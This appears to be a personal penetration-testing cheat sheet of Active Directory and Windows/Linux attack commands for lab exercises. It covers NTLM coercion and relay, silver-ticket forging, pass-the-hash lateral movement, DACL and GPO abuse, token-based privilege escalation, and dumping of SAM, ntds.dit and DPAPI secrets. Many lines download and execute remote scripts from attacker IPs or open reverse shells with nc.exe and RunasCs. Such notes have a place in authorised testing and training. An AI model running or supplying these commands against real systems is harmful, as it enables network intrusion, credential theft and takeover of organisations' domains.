coercer coerce -l MY_IP -t 172.16.19.3 -u own -p 'Password1' -d lab.local -v 
coercer coerce -l MY_IP -t 172.16.19.3 -u own -p 'Password1' -d lab.local -v --filter-method-name EfsRpcAddUsersToFile
python3 printerbug.py inlanefreight/plaintext$:'MTXr3(GW)lnljOj'@172.16.119.70 <My_IP>
# pfx

echo -n "MIIRPQIBAzCCEPcGCSqGSIb3DQEHAaCCEOgEghDkMIIQ4DCCBxcGCSqGSIb3DQEHBqCCBwgwggcEAgEAMI<SNIP>U6EWbi/ttH4BAjUKtJ9ygRfRg==" | base64 -d > ws01.pfx
certipy relay -target "http://172.16.119.3" -template Machinene

coercer scan -t 172.16.119.70 -u 'plaintext$' -p 'MTXr3(GW)lnljOj' -d INLANEFREIGHT.LOCAL -v
coercer coerce -l MY_IP -t 172.16.19.3 -u own -p 'Password1' -d lab.local -v 

certipy auth -pfx backup01.pfx -dc-ip 172.16.119.3

Silver Ticket

impacket-lookupsid 'INLANEFREIGHT.LOCAL\backup01$'@172.16.119.3 -hashes :11d2b884b8b3383ace4a68b8e1d23a8f
impacket-ticketer -nthash 11d2b884b8b3383ace4a68b8e1d23a8f -domain-sid S-1-5-21-1207890233-375443991-2397730614 -domain inlanefreight.local -spn cifs/backup01.inlanefreight.local Administrator
impacket-ticketer -nthash 11d2b884b8b3383ace4a68b8e1d23a8f -domain-sid S-1-5-21-1207890233-375443991-2397730614 -domain inlanefreight.local -spn cifs/backup01.inlanefreight.local -groups 1104,512,519 -user-id 1108 myuser

# vim /etc/hosts to backup01.inlanefreight.local
KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass backup01.inlanefreight.local

ESC11

certipy relay -target "rpc://172.16.119.3" -ca "INLANEFREIGHT-DC01-CA"

coercer scan -t 172.16.119.70 -u 'plaintext$' -p 'MTXr3(GW)lnljOj' -d INLANEFREIGHT.LOCAL -v
coercer coerce -l MY_IP -t 172.16.19.3 -u own -p 'Password1' -d lab.local -v 

certipy auth -pfx backup01.pfx -dc-ip 172.16.119.3

Inveigh

wget https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1
Start-Job {Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y}
Start-Job {Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y}


wget https://github.com/Kevin-Robertson/Inveigh/releases/download/v2.0.10/Inveigh-net4.6.2-v2.0.10.zip
unzip Inveigh-net4.6.2-v2.0.10.zip
Start-Job {.\Inveigh.exe -Console 5 -NBNS y -FileOutput y -LogOutput y}
Receive-Job -Id
Stop-Job -Id 

PsExec

wget https://download.sysinternals.com/files/PSTools.zip

.\PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd

wget https://github.com/maaaaz/impacket-examples-windows/raw/master/psexec.exe
.\psexec.exe htb.local/tom_admin@10.10.164.146 -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

# PTH
net use \\files04
.\PsExec64.exe \\PC1 cmd --accepteula

winRM

# winrm
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$Options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$Command = 'powershell -nop -w hidden -e';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

# winrs 
winrs -r:files04 -u:jen -p:Nexus123!  "powershell -nop -w hidden -e "

# restrict ticket on host RDP
.\Rubeus.exe asktgt /user:leonvqz /rc4:32323DS033D176ABAAF6BEAA0AA681400 /nowrap
.\Rubeus.exe createnetonly /program:powershell.exe /show
.\Rubeus.exe ptt /ticket:
Enter-PSSession SRV02.oscp.exam -Authentication Negotiate

DCOM

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e   ","7")

$mmc = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","172.20.0.52"));
$mmc.Document.ActiveView.ExecuteShellCommand("powershell.exe",$null,"-e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==",0)

RunasCs

https://github.com/antonioCoco/RunasCs

.\RunasCs.exe username password cmd.exe -r 10.10.14.83:7777

TightVNC

https://github.com/frizb/PasswordDecrypts

reg query HKLM\SOFTWARE\TightVNC\Server /s
echo -n 816ECB5CE758EAAA | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

# Linux
apt-get install xtightvncviewer
echo VNCFake1 | proxychains4 -q vncviewer 172.20.0.52 -autopass -quality 0 -nojpeg -compresslevel 1 -encodings "tight hextile" -bgr233

Invoke-TheHash

https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-TheHash -Type SMBExec -Target localhost -Username Administrator -Hash 2b576acbe6bcfda7294d6bd18041b8fe -Command "net localgroup Administrators own_user /add"

Discovery

Windows

LOLBIN

# AD Module
Import-Module ActiveDirectory

# admin
Get-ADGroup -Filter "adminCount -eq 1" | select Name
# groups that Harry Jones is a member of (recursive match)
Get-ADGroup -Filter 'member -RecursiveMatch "CN=Harry Jones,OU=Network Ops,OU=IT,OU=Employees,DC=INLANEFREIGHT,DC=LOCAL"'
Get-ADGroup -LDAPFilter '(member:1.2.840.113556.1.4.1941:=CN=Harry Jones,OU=Network Ops,OU=IT,OU=Employees,DC=INLANEFREIGHT,DC=LOCAL)' |select Name
# description
Get-ADUser -Properties * -LDAPFilter '(&(objectCategory=user)(description=*))' | select samaccountname,description
# SPN
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# ASREPRoast
Get-ADUser -Filter {DoesNotRequirePreAuth -eq 'True'}
# trusted for delegation
Get-ADUser -Properties * -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
Get-ADComputer -Properties * -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'

# DACL
## enumerate the DACL of user01
dsacls.exe ' CN=user01,CN=Users,DC=INLANEFREIGHT,DC=LOCAL'

# Arch
(Get-ComputerInfo).OsArchitecture

PowerView

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview

Ghost
https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/Get-ConstrainedDelegation.ps1

LAPS(Get-LAPSComputers)
https://github.com/leoloobeek/LAPSToolkit/raw/refs/heads/master/LAPSToolkit.ps1

cd /usr/share/windows-resources/powersploit/Recon/
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PowerView.ps1')

# cmd
Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion
Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp,useraccountcontrol
Get-NetSession -Verbose -ComputerName web04 

Get-LocalGroupMember Administrators
Find-LocalAdminAccess
Find-DomainUserLocation
Invoke-UserHunter
Get-NetUser -SPN -Properties samaccountname,serviceprincipalname

# description
Get-DomainUser -Properties samaccountname,description | Where {$_.description -ne $null}
# AS-REP-roastable
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
# Kerberoastable
Get-DomainUser -SPN -Properties samaccountname,serviceprincipalname,memberof
Invoke-Kerberoast

# Delegation 
## Unconstrained
Get-DomainComputer -Unconstrained -Properties dnshostname,useraccountcontrol
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" 
## Constrained
Get-DomainUser -TrustedToAuth -Properties samaccountname,useraccountcontrol,memberof,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth -Property dnshostname,useraccountcontrol,msds-allowedtodelegateto
## Ghost
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.15.96/Get-ConstrainedDelegation.ps1')
Get-ConstrainedDelegation -CheckOrphaned

# GenericAll to User
$geneall = Get-ObjectAcl -Identity "UserName" | ?{$_.ActiveDirectoryRights -eq "GenericAll"} | Select-Object -ExpandProperty SecurityIdentifier | Select -ExpandProperty value
Convert-SidToName $geneall

# DCSync
$dcsync = Get-ObjectACL "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')} | Select-Object -ExpandProperty SecurityIdentifier | Select -ExpandProperty value
Convert-SidToName $dcsync

# DACL
$userSID = (Get-DomainUser -Identity own_user).objectsid
Get-DomainObjectAcl | ?{$_.SecurityIdentifier -eq $userSID}
Get-DomainObjectAcl -Identity target_user | ?{$_.SecurityIdentifier -eq $userSID}

# Current User DACL
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

winPEAS

# on nc.exe
cd /usr/share/peass/winpeas
iwr -Uri http:// -Outfile winPEASany.exe
# on powershell
iwr -Uri http:// -Outfile winPEAS.bat

Powerless

https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk

wget https://raw.githubusercontent.com/gladiatx0r/Powerless/master/Powerless.bat

token

Import-Module NtObjectManager
Get-NtTokenIntegrityLevel

Sherlock

https://github.com/rasta-mouse/Sherlock

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1

IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.36/Sherlock.ps1'); Find-AllVulns

PrivescCheck

https://github.com/itm4n/PrivescCheck

wget https://github.com/itm4n/PrivescCheck/releases/download/2025.10.06-1/PrivescCheck.ps1

IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.36/PrivescCheck.ps1'); Invoke-PrivescCheck

Snaffler

Share Folder

wget https://github.com/SnaffCon/Snaffler/releases/download/1.0.150/Snaffler.exe

.\Snaffler.exe -d oscp.exam -v data

LaZagne

Credential Discovery

.\lazagne.exe all

BloodHound

Sharphound

# Sharphound
cd /usr/share/sharphound/
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All -Domain htb.local -DomainController 10.10.10.1 -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "Name"

.\SharpHound.exe -c All -d htb.local --domainController 10.10.10.1 -o 
.\SharpHound.exe -c All -s --recursedomains

# rusthound
./rusthound_musl -d streamio.htb -i 10.10.11.158 -u 'JDgodd@streamIO.htb' -p 'JDg0dd1s@d0p3cr3@t0r' -z --adcs --ldaps

# bloodhound-ce-python
bloodhound-ce-python -c all -u enox -p california -d heist.offsec -ns 192.168.171.165 --zip
KRB5CCNAME=krb5cc_75401222_O9fxeC bloodhound-ce-python -c all -u user -k -no-pass -d htb.htb -ns 172.16.108.168 --zip

neo4j

MATCH (m:Computer) RETURN m
MATCH (m:User) RETURN m
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

# AS-REP-roastable
MATCH (u:User {dontreqpreauth: true}) RETURN u

# Kerberoastable 
MATCH (u:User) WHERE u.hasspn=true RETURN u

# WinRM
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

# MSSQL SQLAdmin
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

# description
MATCH (u:User) WHERE u.description IS NOT NULL RETURN u

# Delegation unconstrained
MATCH (c:Computer {unconstraineddelegation:true}) return c

# ANY PATH
MATCH p = shortestPath((n)-[*1..]->(c)) WHERE n.name =~ '(?i)ここにUser名.*' AND NOT c=n RETURN p

Userlist

jq '.nodes[].label'

findDelegation

# vim /etc/hosts
impacket-findDelegation htb.LOCAL/user:pass

HostRecon

https://github.com/dafthack/HostRecon/blob/master/HostRecon.ps1

wget https://github.com/dafthack/HostRecon/raw/refs/heads/master/HostRecon.ps1

Invoke-HostRecon

cmd

# Users file
tree /f
Get-ChildItem -force
# hidden tree
function Show-Tree {
    <#
    .SYNOPSIS
    Prints an indented tree of a directory, including hidden entries.

    .DESCRIPTION
    Lists every child of $Path with Get-ChildItem -Force (so hidden and
    system entries are included) and recurses into containers, indenting
    each level by two spaces. Lines are emitted with Write-Output.

    .PARAMETER Path
    Directory to list. Defaults to the current directory.

    .PARAMETER Level
    Current nesting depth; used only to compute the indent. Callers
    normally leave it at 0.
    #>
    param (
        [string]$Path = ".",
        [int]$Level = 0
    )
    # Two spaces of indent per nesting level.
    $indent = " " * ($Level * 2)
    Get-ChildItem -Path $Path -Force | ForEach-Object {
        # $_ is rendered with its default string form (presumably the entry name — confirm on the target PowerShell version).
        Write-Output "$indent|- $_"
        if ($_.PSIsContainer) {
            # Recurse into directories one level deeper.
            Show-Tree -Path $_.FullName -Level ($Level + 1)
        }
    }
}
Show-Tree -Path "C:\Users"
# hidden
dir /a

#Path
set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

# credentials in files
Get-Childitem -Path C:\windows.old -Include *SAM -Recurse -force -ErrorAction SilentlyContinue

findstr /SIM /C:"pass" *.txt *.ini *.cfg *.config *.xml
findstr /spin "password" *.*
findstr /si pass *.txt *.ini *.config *.bat *.ps1 *.vbs

where /R C:\ *.config

# savecred
cmdkey /list
runas /savecred /user:oscp\bob "COMMAND HERE"

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Powershell History
(Get-PSReadLineOption).HistorySavePath

foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

# localadmin
net localgroup administrators

# PowerShell password stored in CliXml
$credential = Import-Clixml -Path ".\connection.xml"
$credential.GetNetworkCredential().password

$secureString = $credential.Password
$plainTextPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString))
echo $plainTextPassword

$password = '01000000d08c9d...';
$secureString = ConvertTo-SecureString $password -Force;
$plainTextPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString))

# Eventlog
wevtutil qe Security /rd:true /f:text | Select-String "/user"

# installed software
wmic product get name

# Port
netstat -ano
tasklist /svc /FI "PID eq 336"

# share
net share

# printer pipe
dir \\dc01\pipe\spoolss

# Writeable folder
icacls C:\xampp\
accesschk.exe "user" C:\Windows -wus

# dpapi
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
dir C:\Users\USER\AppData\Roaming\Microsoft\Protect\
dir C:\Users\USER\AppData\Local\Microsoft\Protect\
.\SharpDPAPI.exe triage
## decrypt
impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -password 'pass' -sid S-1-5-21-1487982659-1829050783-2281216199-1107
impacket-dpapi credential -f C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fb

.\SharpDPAPI.exe credentials /password:'pass' /unprotect

# AD deleted objects (restore)
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Restore-ADObject -Identity f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
Enable-ADAccount -Identity f80369c8-96a2-4a7f-a56c-9c15edd7d1e3

# OS version
systeminfo
$currentVersion = Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
$buildString = "$($currentVersion.CurrentBuild).$($currentVersion.UBR)"
Write-Output $buildString

# ticket purge
klist purge

# password to NT hash (MD4 over UTF-16LE)
printf "%s" 'pass' | iconv -f UTF-8 -t UTF-16LE | openssl dgst -md4

Linux

cmd

# Port
ss -anp

# find
find / -writable -type d 2>/dev/null
find / -iname "*admin*" 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

# cron
cd /etc/crond.d

linpeas

cd /usr/share/peass/linpeas

pspy

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32

Other

git

# git dump
git clone https://github.com/internetwache/GitTools.git
cd GitTools/Dumper 
./gitdumper.sh http://pilgrimage.htb/.git/ web

# git
git clone https://github.com/arthaud/git-dumper
cd git-dumper 
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
./git_dumper.py http://pilgrimage.htb/.git/ web

# cmd
git status
git log
git show [commit]
git reset --hard
git checkout . 

Privilege Escalation

Windows

PowerUp

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

cd /usr/share/windows-resources/powersploit/Privesc/
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PowerUp.ps1')

# AllChecks
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PowerUp.ps1'); Invoke-AllChecks

# john Password123!

# Binary Hijacking
Get-ModifiableServiceFile
## AbuseFunction
Install-ServiceBinary -Name ''

# UnquotedService
Get-UnquotedService
## AbuseFunction  
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"

SharpUp

Ghostpack

.\SharpUp.exe audit

AlwaysInstallElevated

git clone https://github.com/KINGSABRI/MSI-AlwaysInstallElevated
cd MSI-AlwaysInstallElevated

vim WXS-Templates/alwaysInstallElevated-3.wxs

wixl -v WXS-Templates/alwaysInstallElevated-3.wxs -o alwaysInstallElevated.msi
msiexec /qn /i http://192.168.45.240/alwaysInstallElevated.msi
<!-- alwaysInstallElevated-3.wxs -->

<File Id="File0" Name="setup.exe" Source="custom_revshell.exe" /> <!-- Put the executable on the same directory-->

Abuse DACLs

Default

Set SPN GenericAll, GenericWrite, WriteProperty, WriteSPN, Validated-SPN

# PowerView
Set-DomainObject -Identity target_user -Set @{serviceprincipalname='nonexistent/BLAHBLAH'} -Verbose
Get-DomainUser target_user -SPN | Get-DomainSPNTicket | Select-Object -ExpandProperty Hash
Set-DomainObject -Identity target_user -Clear serviceprincipalname -Verbose
# bloodyAD
bloodyAD --host 172.16.1.15 -d inlanefreight.local -u david -p 'Password123!' set object target_user servicePrincipalName -v fake/web01.inlanefreight.local 

Reset Password GenericAll, AllExtendedRights, User-Force-Change-Password

Set-ADAccountPassword target_user -NewPassword $((ConvertTo-SecureString 'Password123!' -AsPlainText -Force)) -Reset -Verbose

# PowerView
Set-DomainUserPassword -Identity target_user -AccountPassword $((ConvertTo-SecureString 'Password123!' -AsPlainText -Force)) -Verbose
# net rpc
net rpc password target_user 'Password123!' -U inlanefreight.local/own_user%'Password1' -S 10.129.205.81

# rpcclient
rpcclient -U INLANEFREIGHT/own_user%Password1 10.129.205.81
setuserinfo2 target_user 23 Password123!

# bloodyAD
bloodyAD --host 172.16.1.15 -d inlanefreight.local  -u svc_sql -p 'XXX' set password david 'Password123!'

WriteDACL

# Group Add
impacket-dacledit -principal own_user -target "Managers" -dc-ip 10.129.205.81 inlanefreight.local/own_user:Password1 -action write

net rpc group addmem "Managers" "own_user" -U inlanefreight.local/own_user%Password1 -S 10.129.205.81
## bloodyAD
bloodyAD --host 172.16.224.100 -d inlanefreight.local -u own_user -p XO7_mh6OnlL5_4 add groupMember "target_grp" target_user

# Password Reset
impacket-dacledit -principal own_user -target "kenta" -dc-ip 10.129.205.81 inlanefreight.local/own_user:Password1 -action write

rpcclient -U INLANEFREIGHT/own_user%Password1 10.129.205.81
setuserinfo2 kenta 23 Password1

# GenericAll
## PowerView
Add-DomainObjectAcl -TargetIdentity target_user -PrincipalIdentity own_user -Rights All

Own Target

impacket-dacledit -principal own_user -target "Managers" -dc-ip 10.129.205.81 inlanefreight.local/own_user:Password1 -action 'write'

net rpc group addmem "Managers" "own_user" -U inlanefreight.local/own_user%Password1 -S 10.129.205.81
## bloodyAD
bloodyAD --host 172.16.224.100 -d inlanefreight.local -u own_user -p XO7_mh6OnlL5_4 add groupMember "target_grp" target_user

# PowerView
Add-DomainGroupMember -Identity MicrosoftSync -Members remote_svc$ -Verbose

WriteOwner

impacket-owneredit -action write -new-owner own_user -target target_user -dc-ip 10.129.205.81 inlanefreight.local/own_user:Password1

impacket-dacledit -principal own_user -target target_user -dc-ip 10.129.205.81 inlanefreight.local/own_user:Password1 -action write

Shadow Credential

GenericAll, GenericWrite, WriteProperty

https://github.com/ShutdownRepo/pywhisker
https://github.com/dirkjanm/PKINITtools

# Get pfx
python3 pywhisker.py -d "certified.htb" -u "JUDITH.MADER" -p "judith09" --target "MANAGEMENT_SVC" --action "add" --filename management

# In PKINITtools
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python3 gettgtpkinit.py -cert-pfx management.pfx -pfx-pass p9bX29Eozi8fT3CEpSvL certified.htb/MANAGEMENT_SVC MANAGEMENT_SVC.ccache
# key is in gettgtpkinit.py output
KRB5CCNAME=MANAGEMENT_SVC.ccache python3 getnthash.py -key c5b9e16f65d7f78cf15c8b185bfb75b2d1df367d1f3091392d336a7130669bef certified.htb/MANAGEMENT_SVC 

Script-Path

Enum

# permission
impacket-dacledit -principal own_user -target 'target' -dc-ip 10.129.229.224  inlanefreight.local/own_user:'pass'
smbcacls //10.129.229.224/NETLOGON /targetScripts -U own_user%'pass'

# scriptPath
ldapsearch -LLL -H ldap://10.129.229.224 -x -D 'own_user@inlanefreight.local' -w 'SecurePassJul!08' -b "DC=inlanefreight,DC=local" "(sAMAccountName=target)" scriptPath

# logon script and smbclient put
vim logon.bat

Modify - GenericWrite, WriteProperty, or Object-type:ScriptPath, User

# logonScript.ldif
dn: CN=target,CN=Users,DC=inlanefreight,DC=local
changetype: modify
replace: scriptPath
scriptPath: targetScripts\logon.bat
ldapmodify -H ldap://10.129.229.224 -x -D 'own_user@inlanefreight.local' -w 'pass' -f logonScript.ldif

Hijack SPN

WriteSPN, WriteProperty, GenericWrite and Delegation (TrustedToAuth)

Ghost
# Hijack Ghost
wget https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/Get-ConstrainedDelegation.ps1
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.15.96/Get-ConstrainedDelegation.ps1')
Get-ConstrainedDelegation -CheckOrphaned
# WriteSPN
Get-DomainObjectAcl -Identity target_PC | ?{$_.ActiveDirectoryRights -eq 'WriteProperty'}
# SPN memo
Get-DomainComputer target_PC | Select-Object -ExpandProperty serviceprincipalname

# Set SPN
Set-DomainObject -Identity target_PC -Set @{serviceprincipalname='dhcp/Ghost_PC'} -Verbose

# Get Ticket
.\Rubeus.exe s4u /domain:inlanefreight.local /user:OWN_PC$ /rc4:OWN_PC /impersonateuser:administrator /msdsspn:"dhcp/Ghost_PC" /nowrap
.\Rubeus.exe tgssub /ticket:<ghost_ticket> /altservice:cifs/target_PC /nowrap
.\Rubeus.exe ptt /ticket:<new_ticket>
Live Hijack
# Delegation
## Get Hijack PC
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.15.96/Get-ConstrainedDelegation.ps1')
Get-ConstrainedDelegation
# WriteSPN
## Hijack PC
Get-DomainObjectAcl -Identity Hijack_PC | ?{$_.ActiveDirectoryRights -eq 'WriteProperty'}
## target_PC
Get-DomainObjectAcl -Identity target_PC | ?{$_.ActiveDirectoryRights -eq 'WriteProperty'}
# SPN memo
(Get-DomainComputer Hijack_PC).serviceprincipalname

# Clear SPN
Set-DomainObject -Identity Hijack_PC -Clear 'serviceprincipalname' -Verbose
# Set SPN
Set-DomainObject -Identity target_PC -Set @{serviceprincipalname='MSSQL/Hijack_PC'} -Verbose

# Get Ticket
## req rc4
.\Rubeus.exe hash /domain:inlanefreight.local /user:OWN_PC$ /password:'Password123!'
## Ticket by Rubeus
.\Rubeus.exe s4u /domain:inlanefreight.local /user:OWN_PC$ /rc4:OWN_PC /impersonateuser:administrator /msdsspn:"MSSQL/Hijack_PC" /nowrap
.\Rubeus.exe tgssub /ticket:<hijack_ticket> /altservice:HTTP/target_PC /nowrap
.\Rubeus.exe ptt /ticket:<new_ticket>
## Ticket by impacket
impacket-getST -spn 'MSSQLSvc/Hijack_PC' -impersonate Administrator 'inlanefreight.local/OWN_PC$' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 172.19.99.10
### alt ticket
git clone -b tgssub https://github.com/ShutdownRepo/impacket/ tgssub
python3 tgssub/examples/tgssub.py -in 'Administrator@MSSQLSvc_db2000@INLANEFREIGHT.LOCAL.ccache' -altservice "cifs/target_PC" -out newticket.ccache 
#### vim /etc/hosts
KRB5CCNAME=newticket.ccache impacket-smbexec -k -no-pass SDE01


# Restore SPN
cat SPN.txt | awk '{printf "\x27%s\x27,", $0}'
## Remove hijack SPN
Set-DomainObject -Identity Hijack_PC -Set @{
serviceprincipalname=...
} -Verbose

# WinRM
Enter-PSSession -ComputerName target_PC

abuse GPO

https://github.com/juliourena/plaintext/blob/master/Powershell/Get-GPOEnumeration.ps1

# Modify GPO priv
Get-GPOEnumeration
# Link GPOs priv
Get-GPOEnumeration -LinkGPOs
# Create GPO priv
Get-GPOEnumeration -CreateGPO

# which OU each computer belongs to
Get-DomainOU | foreach { $ou = $_.distinguishedname; Get-DomainComputer -SearchBase $ou -Properties dnshostname | select @{Name='OU';Expression={$ou}}, @{Name='FQDN';Expression={$_.dnshostname}} }

# Create GPO
New-GPO -Name TestGPO -Comment "This is a test GPO."
# Create GPO link
New-GPLink -Name TestGPO -Target "OU=TestOU,DC=inlanefreight,DC=local"

# Abuse GPO add local admin 
## --force
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount own_user --GPOName "TestGPO" 

LOLBIN

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

# Binary Hijacking
## === Modifiable Service Binaries ===
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls "C:\xampp\mysql\bin\mysqld.exe"
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
net stop mysql
shutdown /r /t 0 

# tasks
schtasks /query /fo LIST /v
Get-ScheduledTask

## Watch
wget https://raw.githubusercontent.com/markwragg/PowerShell-Watch/master/Watch/Public/Watch-Command.ps1
Get-Process -ErrorAction SilentlyContinue | Watch-Command -Difference -Continuous -Seconds 20

#checkcmdline
IEX (iwr 'http://10.10.10.205/check_cmdline.ps1') 

# Services
# === Modifiable Services ===
sc config WindscribeService binpath="cmd /c net localgroup administrators my /add"
sc stop WindscribeService
sc start WindscribeService

token

# PrintSpoofer
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell.exe

# GodPotato
cd /usr/share/windows-resources/binaries/
.\GodPotato-NET4.exe -cmd "C:\Windows\Temp\nc.exe 10.10.14.83 9999 -e cmd"

# SharpToken
cd /usr/share/windows-resources/binaries/
.\SharpToken.exe list_token
.\SharpToken.exe execute "NT AUTHORITY\SYSTEM" cmd true
.\SharpToken.exe add_user admin Abcd1234! Administrators

SePriv

Full Power

https://github.com/itm4n/FullPowers

Psgetsystem

https://github.com/decoder-it/psgetsystem

TakeOwn

https://github.com/fashionproof/EnableAllTokenPrivs

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown

takeown /f 'C:\Department Shares\Private\IT\cred.txt'
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F

BackupPrivilege

https://github.com/giuliano108/SeBackupPrivilege

PS C:\htb> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\htb> Import-Module .\SeBackupPrivilegeCmdLets.dll

PS C:\htb> Set-SeBackupPrivilege
PS C:\htb> Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt

https://book.hacktricks.xyz/v/jp/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges

#ntds.dit
C:\Windows\Temp> diskshadow.exe /s z.dsh
C:\Windows\Temp> robocopy /B z:\Windows\NTDS .\ntds ntds.dit

# SAM SYSTEM
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

z.dsh

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
unix2dos z.dsh

LoadDriver

https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys https://github.com/TarlogicSecurity/EoPLoadDriver/ https://github.com/musheebat/Compiled-capcom-exploit

.\EoPLoadDriver.exe System\CurrentControlSet\Capcom .\Capcom.sys
.\ExploitCapcom.exe

SeManageVolume

https://github.com/CsEnox/SeManageVolumeExploit

# Default
C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll

$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

#DLL Hijacking
systeminfo
c:\windows\system32\wbem\tzres.dll

PrintNightmare

https://github.com/calebstewart/CVE-2021-1675

HiveNightmare

https://github.com/GossiTheDog/HiveNightmare/releases/tag/0.6

S4U

